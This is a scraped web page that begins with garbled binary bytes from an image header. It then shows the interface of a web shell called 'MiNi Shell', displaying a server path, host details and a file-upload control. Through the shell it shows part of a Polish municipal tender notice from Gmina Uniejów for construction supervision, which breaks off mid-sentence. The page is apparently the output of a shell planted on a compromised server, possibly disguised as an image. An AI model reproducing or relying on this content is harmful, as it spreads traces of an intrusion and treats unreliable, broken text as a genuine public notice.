JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230124/0005532901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji inspektora nadzoru inwestorskiego w ramach zadania pn. „Spycimierski gród atrakcją turystyki kulturowej i ludowej uzdrowiska Uniejów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Uniejów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311019579</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Błogosławionego Bogumiła 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Uniejów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@uniejow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://uniejow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji inspektora nadzoru inwestorskiego w ramach zadania pn. „Spycimierski gród atrakcją turystyki kulturowej i ludowej uzdrowiska Uniejów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6f177b3b-9bbc-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00055329</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00047827/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Pełnienie nadzoru inwestorskiego nad robotami budowlanymi w ramach zadania Spycimierski gród atrakcją turystyki kulturowej i ludowej Uzdrowiska Uniejów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> 8. Przedmiot zamówienia jest współfinansowany jest ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego OŚ PRIORYTETOWA VI REWITALIZACJA I POTENCJAŁ ENDOGENICZNY REGIONU. DZIAŁANIE VI.2 ROZWÓJ GOSPODARKI TURYSTYCZNEJ. PODDZIAŁANIE VI.2.1 ROZWÓJ GOSPODARKI TURYSTYCZNEJ </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminauniejow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gminauniejow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, dokumentów, oświadczeń, wniosków, zawiadomień, zapytań oraz przekazywanie informacji odbywa się za przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy znajdującej się pod adresem: https://gminauniejow.ezamawiajacy.pl w zakładce„Korespondencja”. W sytuacjach awaryjnych, np. w przypadku niedziałania platformy Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej (e-mail:urzad@uniejow.pl lub ze służbowej poczty elektronicznej pracowników Urzędu Miasta w<br/>Uniejowie z rozszerzeniem @uniejow.pl) z zastrzeżeniem, iż złożenie oferty może odbyć się wyłącznie za pomocą powyższej Platformy.<br/>2.Ogólne zasady korzystania z Platformy:<br/>a)zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie gminy Uniejów;<br/>https://gminauniejow.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl<br/>b)Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie„zarejestruj się”.<br/>c)Konto zostanie aktywowane w ciągu maksymalnie6 godzin roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej<br/>d) Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>Wymagania dotyczące formatu dokumentów oraz wymagania techniczne :<br/>1)Zamawiający wskazuje minimalne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>a)Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż512 kb/s;<br/>b)Komputer klasy PC lub MAC, spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>c)Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>d)Włączona obsługa JavaScript;<br/>e)Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Plik załączony przez Wykonawcę na PlatformieZakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>2)Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu.<br/>3)Zalecane formaty przesyłanych danych, tj. plików o wielkości do 2GB w txt,rtf,pdf,xps,odt,ods,odp,doc,xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg,mpeg, mp4,m4a,mpeg4,ogg,ogv,zip,tar,gz,gzip,7z,html,<br/>xhtml,css, xml, xsd, gml, rng, xsl,xslt,TSL,XMLsig,XAdES, CAdES, ASIC, XMLenc<br/>Oferty oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>bezpośredni link do strony prowadzonego postępowania:<br/>https://gminauniejow.ezamawiajacy.pl/pn/gminauniejow/demand/notice/publicpzp/curre/list?<br/>USER_MENU_HOVER=publicpzpCurrentNoticePublicList<br/>natomiast po upływie terminu składania ofert dokumenty postępowania dostępne będą w zakładce:<br/>https://gminauniejow.ezamawiajacy.pl/pn/gminauniejow/demand/notice/publicpzp/during/list?<br/>USER_MENU_HOVER=publicpzpDuringNoticePublicList<br/>Dodatkowo wszelkie dokumenty związane z prowadzoną procedurą będą dostępne na stronie internetowej<br/>https://bip.uniejow.pl/zamowienia/tryb/18/lista/0</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest: Gmina Uniejów, ul. Błogosławionego Bogumiła 13, 99 – 210 Uniejów;<br/>b) dane kontaktowe inspektora ochrony danych w Urzędzie Miasta w Uniejowie to daneosobowe@uniejow.pl;<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Pełnienie funkcji inspektora nadzoru inwestorskiego w ramach zadania pn. „Spycimierski gród atrakcją turystyki kulturowej i ludowej uzdrowiska Uniejów”, nr sprawy: ZP.271.1.2023 EL prowadzonym w trybie podstawowym;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t. j. Dz. U. z 2022 r. poz. 1710 z późn. zm.) dalej „ustawa Pzp”;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 7 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.2023 EL</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego nad robotami budowlanymi prowadzonymi w ramach zadania inwestycyjnego pn.: „Spycimierski gród atrakcją turystyki kulturowej i ludowej uzdrowiska Uniejów”<br/>2. Zakres robót objętych nadzorem inwestorskim:<br/>Zamówienie obejmuje nadzór nad robotami w zakresie budowy budynku muzealno – wystawowo – edukacyjnego wraz z zagospodarowaniem terenu oraz infrastrukturą towarzyszącą i techniczną na podstawie dokumentacji projektowej. Inwestycja będzie realizowana w północnej części działki nr dz.nr 406; obr.22 Spycimierz w powiecie poddębickim. Budynek zaprojektowany jest na planie litery U, jako jednokondygnacyjny (w części z poddaszem użytkowym) z podwyższeniem do dwóch kondygnacji w centralnej części, niepodpiwniczony. <br/>2.1.	Zakres nadzorowanych robót obejmuje między innymi: <br/>2.1.1.	Budowę budynku muzealno –wystawowo – edukacyjnego wraz z instalacjami wentylacji mechanicznej i klimatyzacji, wody, wody hydrantowej ppoż, kanalizacji sanitarnej centralnego ogrzewania, wody lodowej, gazu i kotłowni gazowej, instalacji elektrycznych, teletechnicznych; budynek wyposażony ma być w system BMS. <br/>2.1.2.	budowę dziedzińca z widownią drewnianą na konstrukcji stalowej<br/>2.1.3.	budowę ramp, schodków, ławek i innych elementów małej architektury<br/>2.1.4.	budowę ogrodzenia terenu<br/>2.1.5.	wykonanie ciągów pieszych i pieszo-jezdnych oraz nawierzchni utwardzonych<br/>2.1.6.	wykonanie oświetlenia zewnętrznego terenu oraz instalacji energetycznych zewnętrznych<br/>2.1.10	usunięcie kolizji kabli niskoprądowych – przebudowa sieci elektroenergetycznych nN – Energa i oświetlenie uliczne<br/>2.1.11	budowę doziemnej instalacji gazu wraz ze zbiornikiem podziemnym o poj. 4850 dm3 oraz budowę doziemnej instalacji grzewczo - chłodzącej, <br/>2.1.12	nasadzenia zieleni <br/>2.1.13	zagospodarowanie terenu.<br/>2.1.14	Przedmiot zamówienia na roboty obejmuje jedynie wyposażenie wbudowane i elementy niezbędne do funkcjonowania obiektu. Wyposażenie ruchome nie jest objęte przedmiotem zamówienia na nadzorowane roboty. Wykonawca robót zobowiązany jest wykonać instalacje, okablowanie niezbędne do funkcjonowania sprzętu multimedialnego określonego w projekcie. <br/>2.1.15	Przedmiot zamówienia na nadzorowane roboty obejmuje wykonanie zabudowy meblowej w pokojach biurowych i pracowni, lady recepcyjnej (LD1) wraz z kontenerem podbiurkowym (KP1), zabudowy kuchennej (wraz z zabudowywanymi sprzętami) oraz gablot i tablic informacyjnych. Na etapie realizacji wykonawca robót zobowiązany jest uzyskać akceptację Zamawiającego i Projektanta dla oferowanego wyposażenia.<br/>3.	Pełen opis przedmiotu nadzoru jest udostępniony pod postępowaniem na roboty budowlane –sygnatura ZP.271.35.2020 EL https://bip.uniejow.pl/zamowienia/pokaz/847 <br/>4. Zgodnie z ostatnim protokołem częściowego odbioru robót (datowanym na 30.11.2022 r.) zaawansowanie robót wynosiło 40,68%. <br/>5. Wykonawca zobowiązany będzie realizować usługę nadzoru inwestorskiego zgodnie <br/>z obowiązującymi normami i wiedzą techniczną, określonymi m.in. ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2021 r. poz. 2351 z późn. zm.) przy zachowaniu należytej staranności, właściwej organizacji pracy oraz zasad BHP.<br/>6.	Sprawowanie nadzoru inwestorskiego nad realizacją robót budowlanych w szczególności obejmuje:<br/>a.	reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją techniczną, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej;<br/>b.	zweryfikowanie dokumentacji projektowej, sprawdzanie jakości wykonanych robót i wbudowanych wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie<br/>c.	uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń, zgłaszanych przez Wykonawcę robót; <br/>d.	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowanie i udział w czynnościach odbiorów częściowych, odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania.<br/>e.	Potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także, na żądanie inwestora, kontrolowanie rozliczeń budowy.<br/>7. Ponadto Inspektor Nadzoru inwestorskiego zobowiązany jest do:<br/>a.	Kontrolowania prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego oraz wyceny robót.<br/>b.	Rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót, a w razie potrzeby zaciąganie opinii autora projektu, z wyjątkiem spraw mających wpływ na zmianę kosztów budowy.<br/>c.	Składanie raportów o stanie zaawansowania inwestycji na wezwanie Zamawiającego oraz występujących trudnościach w realizacji budowy, niezwłoczne informowanie o odstępstwach od umowy zawartej przez Zamawiającego z Wykonawcą.<br/>d.	Uczestniczenie przy prowadzeniu wszystkich prób, pomiarów i sprawdzeń. <br/>e.	Udział w spotkaniach organizowanych przez Zamawiającego w sprawach dotyczących realizacji przedmiotowej budowy. <br/>f.	Uczestnictwo w komisji odbioru częściowego i końcowego inwestycji oraz komisjach odbiorów gwarancyjnych. <br/>g.	Inspektor powinien nadzorować budowę (roboty budowlane) w takich odstępstwach czasu, aby zapewniona była skuteczność nadzoru, oraz zależnie od potrzeb Wykonawcy i Inwestora- nie rzadziej niż 1 raz w tygodniu.<br/>h.	Zlecenie Wykonawcy robót wykonania dodatkowych badań materiałów lub robót budzących wątpliwości co do ich jakości. <br/>i.	Żądanie dokonania przez Wykonawcę, na jego koszt odkrywek elementów robót budzących wątpliwości w celu sprawdzenia jakości ich wykonania, jeżeli wykonanie tych robót nie zostało zgłoszone do sprawdzenia przed ich zakrycie.<br/>j.	Wstrzymać roboty, jeśli jest to konieczne dla ich prawidłowego wykonania oraz w przypadku, gdy Wykonawca nie wypełnia swych obowiązków z należytą starannością i widzą techniczną. <br/>8.	Przedmiot zamówienia jest współfinansowany jest ze środków Unii Europejskiej z Europejskiego Funduszu Rozwoju Regionalnego OŚ PRIORYTETOWA VI REWITALIZACJA I POTENCJAŁ ENDOGENICZNY REGIONU. DZIAŁANIE VI.2 ROZWÓJ GOSPODARKI TURYSTYCZNEJ. PODDZIAŁANIE VI.2.1 ROZWÓJ GOSPODARKI TURYSTYCZNEJ<br/><br/>10.	Wymóg zatrudnienia na umowę o pracę:<br/>Zamawiający nie stawia wymogu zatrudnienia na umowę o pracę osób wykonujących czynności inspektora nadzoru – samodzielna funkcja techniczna w budownictwie.<br/><br/>11.	Informacja o częściach zamówienia:<br/>Zamawiający nie dokonuje podziału zamówienia na części.<br/><br/>12.	Pozostałe informacje: Zamawiający informuje, iż:<br/>a.	nie stawia wymagań w zakresie zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt 2 ustawy PZP,<br/>b.	nie zastrzega, iż o udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy wskazani o których mowa w 94 ustawy PZP,<br/>c.	nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt. 7 i 8,<br/>d.	nie przewiduje wizji lokalnej, o której mowa w art. 131 ust. 2 ustawy PZP,<br/>e.	nie przewiduje rozliczeń w walutach obcych,<br/>f.	nie przewiduje zwrotu kosztów udziału w postępowaniu, w tym zwrotu kosztów poniesionych z tytułu nabycia kwalifikowanego podpisu elektronicznego,<br/>g.	nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań,<br/>h.	wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał (o ile są mu wiadome na tym etapie) nazwy (firmy) tych podwykonawców,<br/>i.	nie przewiduje zawarcia umowy ramowej,<br/>j.	nie przewiduje aukcji elektronicznej,<br/>k.	nie przewiduje składania katalogów elektronicznych,<br/>l.	nie dopuszcza możliwości składania ofert wariantowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w<br/>kryteriach:<br/>1) „Cena” – C<br/>2) „Doświadczenie inspektora branży elektrycznej”- D<br/>6. Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania Zamawiającego oraz uzyska największą liczbę punktów spośród ofert niepodlegających odrzuceniu.<br/>7. Oferta może 